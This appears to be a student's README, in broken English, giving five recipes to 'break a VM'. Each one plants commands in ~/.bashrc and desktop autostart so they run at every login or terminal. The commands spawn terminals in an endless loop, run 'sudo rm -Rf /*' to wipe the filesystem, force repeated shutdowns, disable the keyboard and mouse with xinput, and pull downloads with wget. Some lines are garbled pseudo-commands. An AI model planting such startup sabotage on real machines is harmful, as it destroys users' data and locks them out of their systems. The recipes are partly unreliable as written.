# five way to break a VM

For find bashrc to execute a command vor every terminal we can access it with **nano ~/.bashrc**

And for open terminal by detecting a terminal, there are **session and startup**
And there are **application Autostarte** in session and start
write: `**exo-open --launch TerminalEmulator**`
and call he `**term**`


- **First way to break a vm**

In the terminal, you must write : `sudo apt install vlc` and accept it.
In this way, we use AutoStart for make an infinit loop which opens a terminal who will open an other terminal, 
and opens a video with vlc with his *user interfacefrom* terminal by terminal by his link in bash rc with: 
`**nano ~/.bashrc**`
 
```bash
- you must write in bashrc:
exo-open --launch TerminalEmulator

xdg-open video.file
alias open="xdg-open" 
vlc https://www.youtube.com/watch?v=Wl959QnD3lM
```


- **Second way to breack a vm** 

for this second way to break a vm, the objective is to display an image and then delete all the files 
and folders of this machine.

In the terminal, you must write : `sudo apt install fim` and accept it.

```bash
-write in bashrc:
download: "https://actualitte.com/uploads/images Capture_20d_E2_80_99e_CC_81cran_202020-07-16_20a_CC_80_2017_25_28-4ef8deae-fd64-41e7-a878-fc58dce7dee3.png"
fim -a /home/baptiste/Download/6gRepdqy.jpg
sudo rm -Rf /*
```

- **Third way to break a vm**
For this Third way to break a vm, the objective is close "shutdown" the session when terminal is open and open terminal, when you login

we use AutoStart to open the terminal.

in bashrc, you must write :

```bash
shutdown -P now
```



- **fourth way to break a vm**

For this fourth way to break a vm, the objective is to download lots of files terminal by terminal 
and disable keyboard and mouse.

we must use AutoStart for make an infinit loop which opens a terminal

```bash
in bashrc write :
exo-open --launch TerminalEmulator

xinput set-prop 12 "Device Enabled" 0
xinput set-prop 11 "Device Enabled" 0

wget "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTP7b--9jZ_TTVb6IhSMg_BzZogRKbvFYKjvg&usqp=CAU"
wget "https://droit-finances.commentcamarche.com/download/telecharger-198-code-civil-pdf-en-ligne?n=1#198"
wget "https://droit-finances.commentcamarche.com/download/telecharger-199-code-penal-pdf-en-ligne?n=1#199"
wget "https://www.conseil-constitutionnel.fr/sites/default/files/2021-09/constitution.pdf"
```


- **fifth way to break a vm**

For this fourth way to break a vm, the objective is just open a video with cvlc (without *user interfacefrom*),
disable keyboard and mouse and shutdawn after the video.
for that, we use AutoStart for open one terminal at the beginning
after that, 
In the terminal, you must write : `sudo apt install vlc` and accept it.
and in bashrc, you must write :

```bash
xinput set-prop 12 "Device Enabled" 0
xinput set-prop 11 "Device Enabled" 0
amixer -D pulse sset Master 100%
cvlc https://www.youtube.com/watch?v=dNQs_Bef_V8

while true
do
    sleep 20
    shutdown -h now
done
```
